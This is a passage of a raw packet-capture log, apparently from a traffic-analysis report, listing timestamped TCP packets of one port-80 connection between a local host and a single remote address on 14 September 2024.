                                        Sep 14, 2024 18:31:11.781088114 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781100035 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781138897 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781152010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781163931 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781173944 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781208992 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781243086 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781374931 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781384945 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781395912 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781407118 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781423092 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781431913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781434059 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781466961 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781486034 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781488895 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781500101 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781511068 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781521082 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781533003 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781542063 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781553030 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781584024 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781615973 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781713009 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781723976 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781739950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781749964 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781760931 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781771898 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781788111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781796932 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781799078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781810999 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781822920 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781824112 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781836987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781846046 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781848907 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781869888 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781899929 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781913042 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781924009 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781934977 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781965971 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.782119036 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782130003 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782140017 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782150984 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782160044 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782171011 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782181025 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782188892 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.782191992 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782211065 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782222033 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782223940 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.782233000 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782243967 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.782253027 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782264948 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782267094 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.782275915 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782285929 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782293081 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.782299042 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782315016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782330990 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.782361984 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.782475948 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782485962 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782537937 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782547951 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.782561064 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.782593012 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.790460110 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.790471077 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.790474892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.790517092 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.790525913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.790534973 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.790543079 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.790570021 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.790570974 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.790608883 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.819669962 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.819706917 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.819716930 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.819772005 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.819777012 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.819782019 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.819793940 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.819804907 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.819927931 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.819927931 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.862900972 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.862943888 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.862952948 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.863001108 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.863010883 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.863020897 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.863065004 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.863075018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.863085032 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.863208055 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.863218069 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.863226891 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.863231897 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.863236904 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.863231897 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.863231897 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.863248110 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.863257885 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.863323927 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.863323927 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.865988016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866030931 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866040945 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866050959 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866055012 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.866095066 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.866128922 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866138935 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866148949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866158009 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866178036 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866182089 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.866218090 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.866249084 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.866319895 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866331100 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866339922 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866349936 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866360903 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866369963 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866381884 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866384029 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.866391897 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866409063 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.866440058 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.866472960 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866483927 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866493940 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866504908 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.866525888 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.866555929 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.867749929 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.867762089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.867772102 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.867810965 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.867813110 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.867846966 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.867858887 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.867868900 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.867899895 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.867937088 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.867948055 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.867965937 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.867975950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.867986917 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.867996931 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.867997885 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868020058 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868076086 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868311882 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868323088 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868333101 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868343115 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868354082 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868362904 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868372917 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868375063 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868386984 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868397951 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868408918 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868418932 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868455887 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868455887 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868474007 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868484974 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868495941 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868511915 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868525028 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868531942 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868535995 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868546963 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868552923 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868560076 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868576050 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868577957 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868593931 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868604898 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868608952 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868617058 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868628025 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868643999 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868657112 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868657112 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868668079 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868679047 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868696928 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868695974 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868710041 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868720055 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868721008 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868733883 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868743896 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868753910 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868763924 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868766069 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868779898 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868791103 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868802071 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868808985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868820906 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868824005 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868834019 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868844032 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868844032 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868884087 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868895054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868905067 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868906021 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868916988 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868927956 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868949890 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868958950 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868962049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868973970 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868983030 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.868987083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.868999958 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.869029045 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.869029045 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.869123936 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.869134903 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.869146109 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.869154930 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.869177103 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.869206905 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.877613068 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.877624989 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.877635956 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.877703905 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.877718925 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.877729893 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.877741098 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.877751112 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.877752066 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.877763987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.877799988 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.877830982 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.906682968 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.906694889 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.906703949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.906713009 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.906723022 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.906730890 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.906740904 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.906753063 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.907016993 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.907016993 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.950117111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.950134993 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.950145006 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.950154066 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.950164080 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.950171947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.950184107 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.950284004 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.950294971 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.950304985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.950306892 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.950308084 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.950314045 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.950325966 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.950367928 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.950380087 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.950386047 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.950386047 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.950386047 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.950440884 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.953069925 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953079939 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953090906 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953146935 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953157902 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953167915 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953183889 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953183889 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.953197002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953217030 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.953255892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953265905 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953277111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953283072 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.953324080 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.953397989 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953408003 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953418016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953428030 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953438044 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953448057 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953454971 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.953491926 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.953491926 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.953531981 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953541994 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953552008 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953560114 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.953584909 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.953619003 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.954772949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.954823017 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.954833031 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.954840899 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.954878092 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.954978943 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.954989910 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.954996109 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.955003977 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.955018997 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.955034971 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.955044985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.955056906 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.955056906 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.955066919 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.955079079 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.955113888 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.955147028 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.955157995 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.955173969 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.955183983 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.955193043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.955209017 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.955219984 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.955219984 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.955230951 CEST8049738172.67.203.195192.168.2.4
